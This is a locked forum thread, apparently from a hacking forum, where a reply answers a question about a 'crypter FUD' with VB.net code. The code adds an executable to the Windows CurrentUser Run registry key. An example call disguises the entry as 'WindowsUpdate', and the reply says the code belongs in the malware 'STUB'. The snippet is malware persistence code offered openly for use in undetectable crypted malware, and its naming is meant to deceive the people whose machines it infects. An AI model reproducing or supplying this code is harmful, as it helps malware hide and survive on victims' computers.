Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy
  • 0

Locked [VB.net] Startup Function


Nazox

Question

3 answers to this question

Recommended Posts

  • 0

Re: [VB.net] Startup Function

 

Wow, you made a crypter FUD and you don't know how to call a function or modify it? risad8

 

[LENGUAJE=vb]

Sub AddStartupCU(sKeyName As String, sPath As String)

My.Computer.Registry.CurrentUser.CreateSubKey("Software\Microsoft\Windows\CurrentVersion\Run").SetValue(sKeyName, sPath)

End Sub[/LENGUAJE]

 

[LENGUAJE=vb]

Call AddStartupCU("WindowsUpdate", Application.ExecutablePath)[/LENGUAJE]

 

Btw, this function goes in STUB, not in client :Lol

Btw2: This is incorrect section.

 

Regards.

Edited by chequinho
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.